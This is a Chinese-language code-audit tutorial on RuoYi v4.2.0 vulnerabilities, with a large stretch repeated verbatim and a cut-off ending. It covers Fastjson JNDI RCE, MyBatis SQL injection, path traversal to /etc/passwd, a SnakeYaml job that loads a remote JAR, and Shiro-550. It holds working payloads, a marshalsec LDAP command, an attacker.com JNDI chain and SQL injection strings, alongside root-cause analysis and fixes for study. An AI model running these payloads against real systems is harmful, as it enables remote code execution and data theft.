RuoYi框架v4.20版本代码审计教学文档<\/strong><\/h3>
文档说明<\/strong><\/h4>
本教学文档旨在系统性地讲解RuoYi（若依）开源管理系统v4.20版本中存在的安全漏洞。通过本教程，您将学习到如何搭建靶场环境、复现漏洞、并深入进行代码审计以理解漏洞的根本原因。本文档涵盖Fastjson RCE、SQL注入、任意文件下载、定时任务RCE以及Shiro反序列化五大类漏洞。<\/p>
目标受众：<\/strong> 具备一定Java和Web安全基础的安全研究人员、开发人员。
所需环境：<\/strong> JDK 1.8、MySQL 5.7+、Maven 3.0+、IntelliJ IDEA。<\/p>

第一章：环境搭建与准备<\/strong><\/h3>
1.1 目标版本选择<\/strong><\/h4>
选择RuoYi v4.2.0版本进行审计，因为该版本集成了多个历史高危漏洞，非常适合学习。漏洞清单如下：<\/p>

漏洞名称<\/th> 访问路径<\/th> 影响版本<\/th> <\/tr> <\/thead>

Fastjson RCE<\/td> \/tool\/gen\/edit<\/code><\/td> <= v4.2.0<\/td> <\/tr>
SQL注入<\/td> \/system\/role\/list<\/code>, \/system\/dept\/edit<\/code><\/td> <= 4.6.1<\/td> <\/tr>
任意文件下载<\/td> \/common\/download\/resource<\/code><\/td> <= v4.5.0<\/td> <\/tr>
定时任务反射RCE<\/td> 系统监控->定时任务->添加任务<\/td> <= v4.6.2<\/td> <\/tr>
Shiro反序列化<\/td> 默认Cookie处理<\/td> <= v4.3.0<\/td> <\/tr> <\/tbody> <\/table>
项目地址：<\/strong> https:\/\/github.com\/yangzongzhuan\/RuoYi\/releases\/tag\/v4.2<\/code><\/p>
1.2 环境配置<\/strong><\/h4> 导入项目：<\/strong> 使用IDEA打开项目文件夹，等待Maven自动下载依赖包。<\/li> 数据库初始化：<\/strong> 创建数据库：create database ry;<\/code><\/li> 导入项目\/sql<\/code>目录下的两个SQL文件：quartz.sql<\/code> 和 ry_20200323.sql<\/code>。<\/li> 修改配置文件：在 ruoyi-admin\/src\/main\/resources\/application-druid.yml<\/code> 中，将数据库密码修改为您本地MySQL的密码。<\/li> <\/ul> <\/li> <\/ol> 1.3 漏洞复现前置知识<\/strong><\/h4> 在复现Fastjson RCE<\/strong>漏洞时，需要注意两点：<\/p> JDK版本：<\/strong> 由于利用链涉及LDAP注入，请确保JDK版本 ≤ 8u191。<\/li> Fastjson AutoType：<\/strong> v4.2.0使用的Fastjson版本默认关闭了AutoType支持。为了复现，需要手动在代码中开启（仅用于学习，生产环境严禁开启）。修改文件：ruoyi-generator\/src\/main\/java\/com\/ruoyi\/generator\/service\/impl\/GenTableServiceImpl.java<\/code><\/li> 在 validateEdit<\/code> 方法开头添加以下代码：<\/li> <\/ul> \/\/ ！！！仅为复现漏洞临时开启，审计完毕后务必注释或删除！！！ <\/span><\/span><\/span><\/span>ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setAutoTypeSupport<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>addAccept<\/span>(<\/span>"org.apache.shiro.jndi.JndiObjectFactory"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 第二章：漏洞复现与代码审计详解<\/strong><\/h3> 2.1 Fastjson 反序列化远程代码执行（RCE）<\/strong><\/h4> 2.1.1 漏洞原理<\/strong><\/h5> Fastjson在反序列化过程中，如果开启了AutoType<\/code>功能，会解析JSON字符串中的@type<\/code>字段，并实例化该字段指定的类。攻击者可以构造一个恶意的JSON，通过@type<\/code>指定一个存在危险方法（如JNDI注入）的类（如JdbcRowSetImpl<\/code>），当Fastjson调用该类的setter方法时，会触发JNDI查找，从而从攻击者控制的LDAP服务器加载并执行恶意代码。<\/p> 简单攻击链：<\/strong> Fastjson解析 -> 实例化JdbcRowSetImpl -> 调用setDataSourceName("ldap:\/\/attacker.com\/Exploit") -> JNDI触发 -> 加载远程恶意类 -> RCE<\/code><\/p> 2.1.2 漏洞复现<\/strong><\/h5> 准备恶意类：<\/strong><\/p> 创建 Exploit.java<\/code> 文件，内容为执行系统命令（如打开计算器）。<\/li> <\/ul> public<\/span> class<\/span> Exploit<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 编译：javac Exploit.java<\/code><\/li> 在生成的 Exploit.class<\/code> 所在目录启动一个HTTP服务：python -m http.server 8000<\/code><\/li> <\/ul> <\/li> 启动恶意LDAP服务器：<\/strong><\/p> 使用工具 marshalsec<\/code>。<\/li> 命令：java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:\/\/<你的IP>:8000\/#Exploit 1389<\/code><\/li> <\/ul> <\/li> 发送攻击Payload：<\/strong><\/p> 功能点：<\/strong> 访问系统菜单：代码生成<\/code> -> 任意选择一张表，点击编辑<\/code> -> 修改字段信息<\/code>并提交。<\/li> 拦截HTTP请求：<\/strong> 使用Burp Suite等工具拦截提交表单的请求。<\/li> 修改参数：<\/strong> 在请求体（通常是JSON格式）的params<\/code>参数后追加以下内容，注意进行URL编码：<\/li> <\/ul> &params%5B@type%5D=org.apache.shiro.jndi.JndiObjectFactory&params%5BresourceName%5D=ldap:\/\/<你的IP>:1389\/Exploit <\/code><\/pre> 发送请求后，目标服务器会弹出计算器。<\/li> <\/ul> <\/li> <\/ol> 2.1.3 代码审计追踪<\/strong><\/h5> 漏洞入口：<\/strong> 审计发现，漏洞位于 GenTableServiceImpl<\/code> 类的 validateEdit<\/code> 方法中。<\/li> 关键代码：<\/strong> public<\/span> void<\/span> validateEdit<\/span>(<\/span>GenTable genTable)<\/span> {<\/span> <\/span><\/span> \/\/ ... 其他代码 ... <\/span><\/span><\/span><\/span> if<\/span> (<\/span>StringUtils.<\/span>isNotEmpty<\/span>(<\/span>genTable.<\/span>getParams<\/span>()))<\/span> {<\/span> <\/span><\/span> \/\/ 此处直接调用parseObject，且genTable.getParams()来自用户可控的输入 <\/span><\/span><\/span><\/span> JSONObject params =<\/span> JSONObject.<\/span>parseObject<\/span>(<\/span>genTable.<\/span>getParams<\/span>());<\/span> <\/span><\/span> \/\/ ... 后续操作 ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 调用链：<\/strong> GenTableController.edit() -> GenTableService.validateEdit() -> JSONObject.parseObject(用户输入)<\/code><\/li> 结论：<\/strong> 由于用户可控的params<\/code>参数被直接传入JSONObject.parseObject()<\/code>，且框架开启了AutoType，导致反序列化漏洞。<\/li> <\/ul> 2.2 SQL注入漏洞<\/strong><\/h4> 2.2.1 漏洞原理<\/strong><\/h5> RuoYi使用MyBatis作为ORM框架。MyBatis中${}<\/code>是字符串替换，会将参数原样拼接到SQL语句中，而非预编译。如果用户输入未经过滤直接放入${}<\/code>中，就会导致SQL注入。<\/p> 2.2.2 漏洞复现与审计<\/strong><\/h5> 漏洞点一：\/system\/role\/list<\/code>（数据权限过滤处）<\/strong><\/p> POC：<\/strong> params[dataScope]=<\/span>and<\/span> extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span> database<\/span>()),0<\/span>x7e)) <\/span><\/span><\/code><\/pre><\/li> 代码追踪：<\/strong> 在 SysRoleMapper.xml<\/code> 中，发现SQL语句使用了 ${params.dataScope}<\/code>。 <select<\/span> id=<\/span>"selectRoleList"<\/span> ...<\/span>><\/span> <\/span><\/span> select ... from sys_role ... <\/span><\/span> <if<\/span> test=<\/span>"params.dataScope != null and params.dataScope != ''"<\/span>><\/span> <\/span><\/span> AND ${params.dataScope} <\/span><\/span> <\/if><\/span> <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre><\/li> 追踪调用链：SysRoleController.list()<\/code> -> SysRoleService.selectRoleList()<\/code> -> SysRoleMapper.selectRoleList()<\/code>。<\/li> 参数dataScope<\/code>通过SysRole<\/code>对象的父类BaseEntity<\/code>中的params<\/code>（Map类型）传递，完全可控。<\/li> <\/ol> <\/li> <\/ul> 漏洞点二：\/system\/dept\/edit<\/code>（更新部门状态处）<\/strong><\/p> POC：<\/strong> ancestors=<\/span>0<\/span>)or<\/span>(extractvalue(1<\/span>,concat((select<\/span> user<\/span>()))));#<\/span> <\/span><\/span><\/code><\/pre><\/li> 代码追踪：<\/strong> 在 SysDeptMapper.xml<\/code> 中，updateDeptStatus<\/code> 方法使用了 ${ancestors}<\/code>。 <update<\/span> id=<\/span>"updateDeptStatus"<\/span> ...<\/span>><\/span> <\/span><\/span> update sys_dept set status = #{status} where dept_id in (${ancestors}) <\/span><\/span><\/update><\/span> <\/span><\/span><\/code><\/pre><\/li> 调用链：SysDeptController.edit()<\/code> -> SysDeptService.updateDept()<\/code> -> SysDeptMapper.updateDeptStatus()<\/code>。<\/li> 参数ancestors<\/code>是SysDept<\/code>对象的一个String类型属性，用户可控。<\/li> <\/ol> <\/li> <\/ul> 2.2.3 修复方案<\/strong><\/h5> 官方后续版本将${params.dataScope}<\/code>的过滤逻辑移至切面类，在传入前清空参数。<\/li> 对于ancestors<\/code>，将其处理为数组，使用MyBatis的<foreach><\/code>标签进行预编译拼接，避免了直接字符串替换。<\/li> <\/ul> 2.3 任意文件下载漏洞<\/strong><\/h4> 2.3.1 漏洞原理<\/strong><\/h5> \/common\/download\/resource<\/code> 接口在处理下载请求时，未对用户传入的文件路径进行有效的目录穿越过滤，直接使用FileInputStream<\/code>读取文件并输出，导致可以下载服务器上的任意文件。<\/p> 2.3.2 漏洞复现<\/strong><\/h5> POC：<\/strong> GET \/common\/download\/resource?resource=\/profile\/..\/..\/..\/..\/etc\/passwd <\/code><\/pre> (Windows系统可尝试下载 ..\/..\/..\/..\/Windows\/win.ini<\/code>)<\/li> <\/ul> 2.3.3 代码审计追踪<\/strong><\/h5> 漏洞入口：<\/strong> CommonController<\/code> 类的 resourceDownload<\/code> 方法。<\/li> 关键代码分析：<\/strong> @GetMapping<\/span>(<\/span>"\/common\/download\/resource"<\/span>)<\/span> <\/span><\/span>public<\/span> void<\/span> resourceDownload<\/span>(<\/span>String resource,<\/span> ...)<\/span> ...<\/span> {<\/span> <\/span><\/span> \/\/ 1. 直接获取resource参数，未过滤目录穿越 <\/span><\/span><\/span><\/span> String localPath =<\/span> RuoYiConfig.<\/span>getProfile<\/span>()<\/span> +<\/span> StringUtils.<\/span>substringAfter<\/span>(<\/span>resource,<\/span> Constants.<\/span>RESOURCE_PREFIX<\/span>);<\/span> <\/span><\/span> \/\/ 2. 直接使用用户拼接的路径下载文件 <\/span><\/span><\/span><\/span> FileUtils.<\/span>writeBytes<\/span>(<\/span>localPath,<\/span> response.<\/span>getOutputStream<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 对比安全接口：<\/strong> 同一个类中的 fileDownload<\/code> 方法使用了 FileUtils.isValidFilename<\/code> 对文件名进行了严格的正则匹配，无法进行目录穿越，因此是安全的。而 resourceDownload<\/code> 方法缺失了此校验。<\/li> <\/ul> 2.3.4 修复方案<\/strong><\/h5> 后续版本增加了 checkAllowDownload<\/code> 方法，用于检测路径中是否包含 ..<\/code> 以及文件扩展名是否在白名单内。<\/p> 2.4 定时任务反射RCE<\/strong><\/h4> 2.4.1 漏洞原理<\/strong><\/h5> RuoYi的定时任务功能允许用户动态添加任务。其中“调用目标字符串”字段用于指定执行的类和方法。系统通过反射机制来调用这个字符串。漏洞在于，这个反射调用没有对类名和方法名做任何限制，导致可以调用任意类的方法。<\/p> 2.4.2 漏洞复现（利用SnakeYaml）<\/strong><\/h5> 准备恶意JAR：<\/strong><\/p> 下载并修改 https:\/\/github.com\/artsploit\/yaml-payload<\/code> 中的 AwesomeScriptEngineFactory.java<\/code>，使其静态代码块执行命令（如 Runtime.getRuntime().exec("calc.exe");<\/code>）。<\/li> 编译并打包成JAR文件：jar -cvf yaml-payload.jar -C src\/ .<\/code><\/li> 将JAR文件放在一个公共HTTP服务器上。<\/li> <\/ul> <\/li> 添加定时任务：<\/strong><\/p> 功能点：<\/strong> 系统监控<\/code> -> 定时任务<\/code> -> 新增<\/code><\/li> 任务名称：<\/strong> 任意<\/li> 调用目标字符串：<\/strong> 填入以下Payload，指向你的JAR文件地址。 org.<\/span>yaml<\/span>.<\/span>snakeyaml<\/span>.<\/span>Yaml<\/span>.<\/span>load<\/span>(<\/span>'<\/span>!!<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span> [!!<\/span>java.<\/span>net<\/span>.<\/span>URLClassLoader<\/span> [[!!<\/span>java.<\/span>net<\/span>.<\/span>URL<\/span> [<\/span>"http:\/\/<你的IP>\/yaml-payload.jar"<\/span>]]]]<\/span>'<\/span>)<\/span> <\/span><\/span><\/code><\/pre><\/li> cron表达式：<\/strong> 例如 0\/10 * * * * ?<\/code>（每10秒执行一次）<\/li> 保存后，任务会定期执行，成功触发后会弹出计算器。<\/li> <\/ul> <\/li> <\/ol> 2.4.3 代码审计追踪<\/strong><\/h5> 调用链：<\/strong> SysJobController.run()<\/code> -> SysJobService.run()<\/code> -> 触发Quartz调度器 -> 执行到 QuartzJobExecution<\/code> -> JobInvokeUtil.invokeMethod(调用目标字符串)<\/code>。<\/li> 核心问题：<\/strong> JobInvokeUtil.invokeMethod<\/code> 方法使用 Class.forName()<\/code> 和 getMethod<\/code> 进行反射调用，传入的参数是用户完全可控的字符串，没有安全校验。<\/li> <\/ul> 2.4.4 修复方案<\/strong><\/h5> 后续版本增加了黑名单校验，禁止调用如 ScriptEngineManager<\/code>、URLClassLoader<\/code> 等危险类。<\/p> 2.5 Shiro反序列化漏洞（Shiro-550）<\/strong><\/h4> 2.5.1 漏洞原理<\/strong><\/h5> Apache Shiro框架使用一个固定的密钥（硬编码）对用户的RememberMe Cookie进行加密。攻击者如果获取到这个默认密钥，就可以构造一个恶意的序列化对象，加密后伪装成RememberMe Cookie发送给服务器。Shiro在解密后会对其进行反序列化，从而触发RCE。<\/p> 2.5.2 漏洞复现<\/strong><\/h5> 使用攻击工具：<\/strong> 如 ShiroAttack2<\/code>。<\/li> 输入目标URL。<\/strong><\/li> 选择检测\/利用：<\/strong> 工具会自动检测Shiro版本并使用相应的加密方式（v4.2.0的Shiro为1.4.2，使用AES-GCM加密）。<\/li> 爆破密钥：<\/strong> 工具会利用默认密钥库进行爆破，成功后会显示密钥。<\/li> 利用：<\/strong> 选择利用链（如CommonsBeanutils1），填写要执行的命令，即可获得RCE。<\/li> <\/ol> 2.5.3 代码审计追踪<\/strong><\/h5> 密钥位置：<\/strong> 在 ShiroConfig.java<\/code> 配置类中，可以找到硬编码的密钥 fCq+\/xWjdhSACJMLPDqZnQ==<\/code>。 cookie.<\/span>setCipherKey<\/span>(<\/span>Base64.<\/span>decode<\/span>(<\/span>"fCq+\/xWjdhSACJMLPDqZnQ=="<\/span>));<\/span> <\/span><\/span><\/code><\/pre><\/li> 此默认密钥是公开的，直接导致了漏洞。<\/li> <\/ul> 2.5.4 修复方案<\/strong><\/h5> 官方修复方案是升级Shiro到安全版本，并在配置中生成一个随机的、强壮的密钥替换掉默认密钥。<\/p> 第三章：总结与修复建议<\/strong><\/h3> 核心安全启示：<\/strong><\/p> 永不信任用户输入：<\/strong> 所有漏洞的根本原因都是对用户输入的数据没有进行严格的校验和过滤。<\/li> 最小化组件使用风险：<\/strong> 谨慎选择和使用第三方组件（如Fastjson、Shiro），并及时更新到安全版本。<\/li> 遵循安全编码规范：<\/strong> 使用预编译（#{}<\/code>）替代字符串拼接（${}<\/code>）；对文件路径进行规范化校验；对反射调用进行严格的类名、方法名白名单控制。<\/li> <\/ol> 针对RuoYi v4.2.0的修复路径：<\/strong> 最根本的方法是升级到最新官方安全版本<\/strong>。新版本已修复上述所有漏洞。<\/p> 本教学文档完。请务必在隔离的测试环境中进行实践，切勿用于任何非法用途。<\/p>

漏洞名称<\/th>	访问路径<\/th>	影响版本<\/th> <\/tr> <\/thead>
Fastjson RCE<\/td>	`\/tool\/gen\/edit<\/code><\/td>`	<= v4.2.0<\/td> <\/tr>
SQL注入<\/td>	`\/system\/role\/list<\/code>, \/system\/dept\/edit<\/code><\/td>`	<= 4.6.1<\/td> <\/tr>
任意文件下载<\/td>	`\/common\/download\/resource<\/code><\/td>`	<= v4.5.0<\/td> <\/tr>
定时任务反射RCE<\/td>	系统监控->定时任务->添加任务<\/td>	<= v4.6.2<\/td> <\/tr>
Shiro反序列化<\/td>	默认Cookie处理<\/td>	<= v4.3.0<\/td> <\/tr> <\/tbody> <\/table> 项目地址：<\/strong> `https:\/\/github.com\/yangzongzhuan\/RuoYi\/releases\/tag\/v4.2<\/code><\/p>` 1.2 环境配置<\/strong><\/h4> 导入项目：<\/strong> 使用IDEA打开项目文件夹，等待Maven自动下载依赖包。<\/li> 数据库初始化：<\/strong> 创建数据库：create database ry;<\/code><\/li> 导入项目\/sql<\/code>目录下的两个SQL文件：quartz.sql<\/code> 和 ry_20200323.sql<\/code>。<\/li> 修改配置文件：在 ruoyi-admin\/src\/main\/resources\/application-druid.yml<\/code> 中，将数据库密码修改为您本地MySQL的密码。<\/li> <\/ul> <\/li> <\/ol> 1.3 漏洞复现前置知识<\/strong><\/h4> 在复现Fastjson RCE<\/strong>漏洞时，需要注意两点：<\/p> JDK版本：<\/strong> 由于利用链涉及LDAP注入，请确保JDK版本 ≤ 8u191。<\/li> Fastjson AutoType：<\/strong> v4.2.0使用的Fastjson版本默认关闭了AutoType支持。为了复现，需要手动在代码中开启（仅用于学习，生产环境严禁开启）。修改文件：ruoyi-generator\/src\/main\/java\/com\/ruoyi\/generator\/service\/impl\/GenTableServiceImpl.java<\/code><\/li> 在 validateEdit<\/code> 方法开头添加以下代码：<\/li> <\/ul> \/\/ ！！！仅为复现漏洞临时开启，审计完毕后务必注释或删除！！！ <\/span><\/span><\/span><\/span>ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setAutoTypeSupport<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>addAccept<\/span>(<\/span>"org.apache.shiro.jndi.JndiObjectFactory"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 第二章：漏洞复现与代码审计详解<\/strong><\/h3> 2.1 Fastjson 反序列化远程代码执行（RCE）<\/strong><\/h4> 2.1.1 漏洞原理<\/strong><\/h5> Fastjson在反序列化过程中，如果开启了AutoType<\/code>功能，会解析JSON字符串中的@type<\/code>字段，并实例化该字段指定的类。攻击者可以构造一个恶意的JSON，通过@type<\/code>指定一个存在危险方法（如JNDI注入）的类（如JdbcRowSetImpl<\/code>），当Fastjson调用该类的setter方法时，会触发JNDI查找，从而从攻击者控制的LDAP服务器加载并执行恶意代码。<\/p> 简单攻击链：<\/strong> Fastjson解析 -> 实例化JdbcRowSetImpl -> 调用setDataSourceName("ldap:\/\/attacker.com\/Exploit") -> JNDI触发 -> 加载远程恶意类 -> RCE<\/code><\/p> 2.1.2 漏洞复现<\/strong><\/h5> 准备恶意类：<\/strong><\/p> 创建 Exploit.java<\/code> 文件，内容为执行系统命令（如打开计算器）。<\/li> <\/ul> public<\/span> class<\/span> Exploit<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 编译：javac Exploit.java<\/code><\/li> 在生成的 Exploit.class<\/code> 所在目录启动一个HTTP服务：python -m http.server 8000<\/code><\/li> <\/ul> <\/li> 启动恶意LDAP服务器：<\/strong><\/p> 使用工具 marshalsec<\/code>。<\/li> 命令：java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:\/\/<你的IP>:8000\/#Exploit 1389<\/code><\/li> <\/ul> <\/li> 发送攻击Payload：<\/strong><\/p> 功能点：<\/strong> 访问系统菜单：代码生成<\/code> -> 任意选择一张表，点击编辑<\/code> -> 修改字段信息<\/code>并提交。<\/li> 拦截HTTP请求：<\/strong> 使用Burp Suite等工具拦截提交表单的请求。<\/li> 修改参数：<\/strong> 在请求体（通常是JSON格式）的params<\/code>参数后追加以下内容，注意进行URL编码：<\/li> <\/ul> &params%5B@type%5D=org.apache.shiro.jndi.JndiObjectFactory&params%5BresourceName%5D=ldap:\/\/<你的IP>:1389\/Exploit <\/code><\/pre> 发送请求后，目标服务器会弹出计算器。<\/li> <\/ul> <\/li> <\/ol> 2.1.3 代码审计追踪<\/strong><\/h5> 漏洞入口：<\/strong> 审计发现，漏洞位于 GenTableServiceImpl<\/code> 类的 validateEdit<\/code> 方法中。<\/li> 关键代码：<\/strong> public<\/span> void<\/span> validateEdit<\/span>(<\/span>GenTable genTable)<\/span> {<\/span> <\/span><\/span> \/\/ ... 其他代码 ... <\/span><\/span><\/span><\/span> if<\/span> (<\/span>StringUtils.<\/span>isNotEmpty<\/span>(<\/span>genTable.<\/span>getParams<\/span>()))<\/span> {<\/span> <\/span><\/span> \/\/ 此处直接调用parseObject，且genTable.getParams()来自用户可控的输入 <\/span><\/span><\/span><\/span> JSONObject params =<\/span> JSONObject.<\/span>parseObject<\/span>(<\/span>genTable.<\/span>getParams<\/span>());<\/span> <\/span><\/span> \/\/ ... 后续操作 ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 调用链：<\/strong> GenTableController.edit() -> GenTableService.validateEdit() -> JSONObject.parseObject(用户输入)<\/code><\/li> 结论：<\/strong> 由于用户可控的params<\/code>参数被直接传入JSONObject.parseObject()<\/code>，且框架开启了AutoType，导致反序列化漏洞。<\/li> <\/ul> 2.2 SQL注入漏洞<\/strong><\/h4> 2.2.1 漏洞原理<\/strong><\/h5> RuoYi使用MyBatis作为ORM框架。MyBatis中${}<\/code>是字符串替换，会将参数原样拼接到SQL语句中，而非预编译。如果用户输入未经过滤直接放入${}<\/code>中，就会导致SQL注入。<\/p> 2.2.2 漏洞复现与审计<\/strong><\/h5> 漏洞点一：\/system\/role\/list<\/code>（数据权限过滤处）<\/strong><\/p> POC：<\/strong> params[dataScope]=<\/span>and<\/span> extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span> database<\/span>()),0<\/span>x7e)) <\/span><\/span><\/code><\/pre><\/li> 代码追踪：<\/strong> 在 SysRoleMapper.xml<\/code> 中，发现SQL语句使用了 ${params.dataScope}<\/code>。 <select<\/span> id=<\/span>"selectRoleList"<\/span> ...<\/span>><\/span> <\/span><\/span> select ... from sys_role ... <\/span><\/span> <if<\/span> test=<\/span>"params.dataScope != null and params.dataScope != ''"<\/span>><\/span> <\/span><\/span> AND ${params.dataScope} <\/span><\/span> <\/if><\/span> <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre><\/li> 追踪调用链：SysRoleController.list()<\/code> -> SysRoleService.selectRoleList()<\/code> -> SysRoleMapper.selectRoleList()<\/code>。<\/li> 参数dataScope<\/code>通过SysRole<\/code>对象的父类BaseEntity<\/code>中的params<\/code>（Map类型）传递，完全可控。<\/li> <\/ol> <\/li> <\/ul> 漏洞点二：\/system\/dept\/edit<\/code>（更新部门状态处）<\/strong><\/p> POC：<\/strong> ancestors=<\/span>0<\/span>)or<\/span>(extractvalue(1<\/span>,concat((select<\/span> user<\/span>()))));#<\/span> <\/span><\/span><\/code><\/pre><\/li> 代码追踪：<\/strong> 在 SysDeptMapper.xml<\/code> 中，updateDeptStatus<\/code> 方法使用了 ${ancestors}<\/code>。 <update<\/span> id=<\/span>"updateDeptStatus"<\/span> ...<\/span>><\/span> <\/span><\/span> update sys_dept set status = #{status} where dept_id in (${ancestors}) <\/span><\/span><\/update><\/span> <\/span><\/span><\/code><\/pre><\/li> 调用链：SysDeptController.edit()<\/code> -> SysDeptService.updateDept()<\/code> -> SysDeptMapper.updateDeptStatus()<\/code>。<\/li> 参数ancestors<\/code>是SysDept<\/code>对象的一个String类型属性，用户可控。<\/li> <\/ol> <\/li> <\/ul> 2.2.3 修复方案<\/strong><\/h5> 官方后续版本将${params.dataScope}<\/code>的过滤逻辑移至切面类，在传入前清空参数。<\/li> 对于ancestors<\/code>，将其处理为数组，使用MyBatis的<foreach><\/code>标签进行预编译拼接，避免了直接字符串替换。<\/li> <\/ul> 2.3 任意文件下载漏洞<\/strong><\/h4> 2.3.1 漏洞原理<\/strong><\/h5> \/common\/download\/resource<\/code> 接口在处理下载请求时，未对用户传入的文件路径进行有效的目录穿越过滤，直接使用FileInputStream<\/code>读取文件并输出，导致可以下载服务器上的任意文件。<\/p> 2.3.2 漏洞复现<\/strong><\/h5> POC：<\/strong> GET \/common\/download\/resource?resource=\/profile\/..\/..\/..\/..\/etc\/passwd <\/code><\/pre> (Windows系统可尝试下载 ..\/..\/..\/..\/Windows\/win.ini<\/code>)<\/li> <\/ul> 2.3.3 代码审计追踪<\/strong><\/h5> 漏洞入口：<\/strong> CommonController<\/code> 类的 resourceDownload<\/code> 方法。<\/li> 关键代码分析：<\/strong> @GetMapping<\/span>(<\/span>"\/common\/download\/resource"<\/span>)<\/span> <\/span><\/span>public<\/span> void<\/span> resourceDownload<\/span>(<\/span>String resource,<\/span> ...)<\/span> ...<\/span> {<\/span> <\/span><\/span> \/\/ 1. 直接获取resource参数，未过滤目录穿越 <\/span><\/span><\/span><\/span> String localPath =<\/span> RuoYiConfig.<\/span>getProfile<\/span>()<\/span> +<\/span> StringUtils.<\/span>substringAfter<\/span>(<\/span>resource,<\/span> Constants.<\/span>RESOURCE_PREFIX<\/span>);<\/span> <\/span><\/span> \/\/ 2. 直接使用用户拼接的路径下载文件 <\/span><\/span><\/span><\/span> FileUtils.<\/span>writeBytes<\/span>(<\/span>localPath,<\/span> response.<\/span>getOutputStream<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 对比安全接口：<\/strong> 同一个类中的 fileDownload<\/code> 方法使用了 FileUtils.isValidFilename<\/code> 对文件名进行了严格的正则匹配，无法进行目录穿越，因此是安全的。而 resourceDownload<\/code> 方法缺失了此校验。<\/li> <\/ul> 2.3.4 修复方案<\/strong><\/h5> 后续版本增加了 checkAllowDownload<\/code> 方法，用于检测路径中是否包含 ..<\/code> 以及文件扩展名是否在白名单内。<\/p> 2.4 定时任务反射RCE<\/strong><\/h4> 2.4.1 漏洞原理<\/strong><\/h5> RuoYi的定时任务功能允许用户动态添加任务。其中“调用目标字符串”字段用于指定执行的类和方法。系统通过反射机制来调用这个字符串。漏洞在于，这个反射调用没有对类名和方法名做任何限制，导致可以调用任意类的方法。<\/p> 2.4.2 漏洞复现（利用SnakeYaml）<\/strong><\/h5> 准备恶意JAR：<\/strong><\/p> 下载并修改 https:\/\/github.com\/artsploit\/yaml-payload<\/code> 中的 AwesomeScriptEngineFactory.java<\/code>，使其静态代码块执行命令（如 Runtime.getRuntime().exec("calc.exe");<\/code>）。<\/li> 编译并打包成JAR文件：jar -cvf yaml-payload.jar -C src\/ .<\/code><\/li> 将JAR文件放在一个公共HTTP服务器上。<\/li> <\/ul> <\/li> 添加定时任务：<\/strong><\/p> 功能点：<\/strong> 系统监控<\/code> -> 定时任务<\/code> -> 新增<\/code><\/li> 任务名称：<\/strong> 任意<\/li> 调用目标字符串：<\/strong> 填入以下Payload，指向你的JAR文件地址。 org.<\/span>yaml<\/span>.<\/span>snakeyaml<\/span>.<\/span>Yaml<\/span>.<\/span>load<\/span>(<\/span>'<\/span>!!<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span> [!!<\/span>java.<\/span>net<\/span>.<\/span>URLClassLoader<\/span> [[!!<\/span>java.<\/span>net<\/span>.<\/span>URL<\/span> [<\/span>"http:\/\/<你的IP>\/yaml-payload.jar"<\/span>]]]]<\/span>'<\/span>)<\/span> <\/span><\/span><\/code><\/pre><\/li> cron表达式：<\/strong> 例如 0\/10 * * * * ?<\/code>（每10秒执行一次）<\/li> 保存后，任务会定期执行，成功触发后会弹出计算器。<\/li> <\/ul> <\/li> <\/ol> 2.4.3 代码审计追踪<\/strong><\/h5> 调用链：<\/strong> SysJobController.run()<\/code> -> SysJobService.run()<\/code> -> 触发Quartz调度器 -> 执行到 QuartzJobExecution<\/code> -> JobInvokeUtil.invokeMethod(调用目标字符串)<\/code>。<\/li> 核心问题：<\/strong> JobInvokeUtil.invokeMethod<\/code> 方法使用 Class.forName()<\/code> 和 getMethod<\/code> 进行反射调用，传入的参数是用户完全可控的字符串，没有安全校验。<\/li> <\/ul> 2.4.4 修复方案<\/strong><\/h5> 后续版本增加了黑名单校验，禁止调用如 ScriptEngineManager<\/code>、URLClassLoader<\/code> 等危险类。<\/p> 2.5 Shiro反序列化漏洞（Shiro-550）<\/strong><\/h4> 2.5.1 漏洞原理<\/strong><\/h5> Apache Shiro框架使用一个固定的密钥（硬编码）对用户的RememberMe Cookie进行加密。攻击者如果获取到这个默认密钥，就可以构造一个恶意的序列化对象，加密后伪装成RememberMe Cookie发送给服务器。Shiro在解密后会对其进行反序列化，从而触发RCE。<\/p> 2.5.2 